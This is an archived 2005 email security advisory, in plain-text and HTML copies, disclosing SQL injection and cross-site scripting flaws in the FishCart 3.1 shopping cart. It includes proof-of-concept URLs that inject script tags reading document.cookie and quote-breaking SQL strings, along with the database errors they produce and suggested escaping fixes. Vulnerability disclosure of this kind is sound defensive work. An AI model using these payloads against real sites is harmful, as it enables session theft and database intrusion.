FishCart 3.1 suffers from multiple SQL injection and cross site scripting flaws.
c023c88e9e8a37a65fd2b6db46305dbbb93476aca0cb1765c8a1a959aa1e5e30
------=_NextPart_001_005A_01C55049.DEF610F0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Dcrab 's Security Advisory
[Hsc Security Group] https://www.hackerscenter.com/
[dP Security] https://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. =
Learn more at https://www.digitalparadox.org/services.ah
***SPECIAL OFFER***
Hire my auditing services, if I dont find anything, its FREE..!! =
https://www.digitalparadox.org/services.ah
Looking for Publishers intrested in my Php Secure Coding Book.
Severity: High
Title: Multiple SQL injections and XSS in FishCart 3.1
Date: 4/05/2005
Vendor: FishNet Inc
Vendor Website: https://www.fishnetinc.com
Summary: There are, multiple sql injections and xss in fishcart 3.1.
Proof of Concept Exploits:=20
https://example.com/demo31/display.php?cartid=3D200505024231092&zid=3D1&li=
d=3D1&nlst=3D'"><script>alert(document.cookie)</script>&olimit=3D0&cat=3D=
&key1=3D&psku=3D
XSS
https://example.com/demo31/display.php?cartid=3D200505024231092&zid=3D1&li=
d=3D1&nlst=3Dy&olimit=3D0&cat=3D&key1=3D&psku=3D'SQL_INJECTION
SQL INJECTION
Database error: Invalid SQL: select count(*) as cnt from =
cvsdemo31prod,cvsdemo31prodlang where nzid=3D1 and nprodsku=3Dprodsku =
and prodzid=3D1 and nprodsku=3Dprodlsku and prodlzid=3D1 and =
prodlid=3D1prodsku=3D'''SQL_INJECTION' and prodlsku=3D'''SQL_INJECTION' =
and prodzid=3D1 and prodzid=3Dprodlzid and prodlid=3D1 and =
(produseinvq=3D0 or (produseinvq=3D1 and prodinvqty>0))
MySQL Error: 1054 (Unknown column 'nzid' in 'where clause')
Session halted.
https://example.com/demo31/upstnt.php?zid=3D1&lid=3D1&cartid=3D'SQL_INJECT=
ION
SQL INJECTION
Database error: Invalid SQL: select sku,qty from cvsdemo31oline where =
orderid=3D''SQL_INJECTION'
MySQL Error: 1064 (You have an error in your SQL syntax near =
'SQL_INJECTION'' at line 1)
Session halted.
https://example.com/demo31/upstracking.php?trackingnum=3D'"><script>alert(=
document.cookie)</script>&reqagree=3Dchecked&m=3D
XSS
https://example.com/demo31/upstracking.php?trackingnum=3D&reqagree=3D'"><s=
cript>alert(document.cookie)</script>&m=3D
XSS
https://example.com/demo31/upstracking.php?trackingnum=3D&reqagree=3Dcheck=
ed&m=3D'"><script>alert(document.cookie)</script>
XSS
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), =
mysql_real_escape_string() and other functions for input validation =
before passing user input to the mysql database, or before echoing data =
on the screen, would solve these problems.
Keep your self updated, Rss feed at: https://digitalparadox.org/rss.ah
Author:=20
These vulnerabilities have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
https://www.hackerscenter.com or https://digitalparadox.org/.
-------------------------------------------------------------------------=
-------
Sincerely,=20
Diabolic Crab=20
------=_NextPart_001_005A_01C55049.DEF610F0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2627" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR>[Hsc =
Security Group]=20
<A =
href=3D"https://www.hackerscenter.com/">https://www.hackerscenter.com/</A><=
BR>[dP=20
Security] <A=20
href=3D"https://digitalparadox.org/">https://digitalparadox.org/</A></FONT>=
</DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web =
servers,=20
scripts, networks, etc. Learn more at <A=20
href=3D"https://www.digitalparadox.org/services.ah">https://www.digitalpara=
dox.org/services.ah</A></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>***SPECIAL OFFER***<BR>Hire my auditing =
services,=20
if I dont find anything, its FREE..!! <A=20
href=3D"https://www.digitalparadox.org/services.ah">https://www.digitalpara=
dox.org/services.ah</A></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Looking for Publishers intrested in my =
Php Secure=20
Coding Book.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: Multiple SQL =
injections=20
and XSS in FishCart 3.1<BR>Date: 4/05/2005</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>Vendor: FishNet Inc<BR>Vendor Website: =
<A=20
href=3D"https://www.fishnetinc.com">https://www.fishnetinc.com</A><BR>Summa=
ry: There=20
are, multiple sql injections and xss in fishcart 3.1.</FONT></DIV>
<DIV> </DIV><FONT face=3DArial size=3D2>
<DIV><BR>Proof of Concept Exploits: </DIV>
<DIV> </DIV>
<DIV><A=20
href=3D"https://example.com/demo31/display.php?cartid=3D200505024231092&am=
p;zid=3D1&lid=3D1&nlst=3D'"><script>alert(document.cookie)</=
script>&olimit=3D0&cat=3D&key1=3D&psku">https://example.co=
m/demo31/display.php?cartid=3D200505024231092&zid=3D1&lid=3D1&=
;nlst=3D'"><script>alert(document.cookie)</script>&oli=
mit=3D0&cat=3D&key1=3D&psku</A>=3D<BR>XSS</DIV>
<DIV> </DIV>
<DIV><A=20
href=3D"https://example.com/demo31/display.php?cartid=3D200505024231092&am=
p;zid=3D1&lid=3D1&nlst=3Dy&olimit=3D0&cat=3D&key1=3D&=
amp;psku=3D'SQL_INJECTION">https://example.com/demo31/display.php?cartid=3D=
200505024231092&zid=3D1&lid=3D1&nlst=3Dy&olimit=3D0&c=
at=3D&key1=3D&psku=3D'SQL_INJECTION</A><BR>SQL=20
INJECTION</DIV>
<DIV> </DIV>
<DIV>Database error: Invalid SQL: select count(*) as cnt from=20
cvsdemo31prod,cvsdemo31prodlang where nzid=3D1 and nprodsku=3Dprodsku =
and prodzid=3D1=20
and nprodsku=3Dprodlsku and prodlzid=3D1 and =
prodlid=3D1prodsku=3D'''SQL_INJECTION' and=20
prodlsku=3D'''SQL_INJECTION' and prodzid=3D1 and prodzid=3Dprodlzid and =
prodlid=3D1 and=20
(produseinvq=3D0 or (produseinvq=3D1 and prodinvqty>0))<BR>MySQL =
Error: 1054=20
(Unknown column 'nzid' in 'where clause')<BR>Session halted.</DIV>
<DIV> </DIV>
<DIV><BR><A=20
href=3D"https://example.com/demo31/upstnt.php?zid=3D1&lid=3D1&cart=
id=3D'SQL_INJECTION">https://example.com/demo31/upstnt.php?zid=3D1&lid=
=3D1&cartid=3D'SQL_INJECTION</A><BR>SQL=20
INJECTION</DIV>
<DIV> </DIV>
<DIV>Database error: Invalid SQL: select sku,qty from cvsdemo31oline =
where=20
orderid=3D''SQL_INJECTION'<BR>MySQL Error: 1064 (You have an error in =
your SQL=20
syntax near 'SQL_INJECTION'' at line 1)<BR>Session halted.</DIV>
<DIV> </DIV>
<DIV><A=20
href=3D"https://example.com/demo31/upstracking.php?trackingnum=3D'"><=
script>alert(document.cookie)</script>&reqagree=3Dchecked&m">http=
://example.com/demo31/upstracking.php?trackingnum=3D'"><script>a=
lert(document.cookie)</script>&reqagree=3Dchecked&m</A>=3D<=
BR>XSS</DIV>
<DIV> </DIV>
<DIV><BR><A=20
href=3D"https://example.com/demo31/upstracking.php?trackingnum=3D&reqa=
gree=3D'"><script>alert(document.cookie)</script>&m">https://exam=
ple.com/demo31/upstracking.php?trackingnum=3D&reqagree=3D'"><sc=
ript>alert(document.cookie)</script>&m</A>=3D<BR>XSS</DIV>
<DIV> </DIV>
<DIV><A=20
href=3D"https://example.com/demo31/upstracking.php?trackingnum=3D&reqa=
gree=3Dchecked&m=3D'"><script>alert(document.cookie)</script">ht=
tp://example.com/demo31/upstracking.php?trackingnum=3D&reqagree=3Dche=
cked&m=3D'"><script>alert(document.cookie)</script</A>>=
;<BR>XSS</DIV>
<DIV> </DIV>
<DIV><BR>Possible Fixes: The usage of htmlspeacialchars(),=20
mysql_escape_string(), mysql_real_escape_string() and other functions =
for input=20
validation before passing user input to the mysql database, or before =
echoing=20
data on the screen, would solve these problems.</DIV>
<DIV> </DIV>
<DIV>Keep your self updated, Rss feed at: <A=20
href=3D"https://digitalparadox.org/rss.ah">https://digitalparadox.org/rss.a=
h</A></DIV>
<DIV> </DIV>
<DIV>Author: <BR>These vulnerabilities have been found and released by =
Diabolic=20
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =
free to=20
contact me regarding these vulnerabilities. You can find me at, <A=20
href=3D"https://www.hackerscenter.com">https://www.hackerscenter.com</A> =
or <A=20
href=3D"https://digitalparadox.org/">https://digitalparadox.org/</A>.</DIV>=
<DIV> </DIV>
<DIV></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV>
<HR>
<BR>Sincerely, <BR>Diabolic Crab <BR><IMG=20
src=3D"mhtml:mid://00000083/!https://digitalparadox.org/dc.gif"=20
border=3D0><BR><BR></DIV></BODY></HTML>
------=_NextPart_001_005A_01C55049.DEF610F0--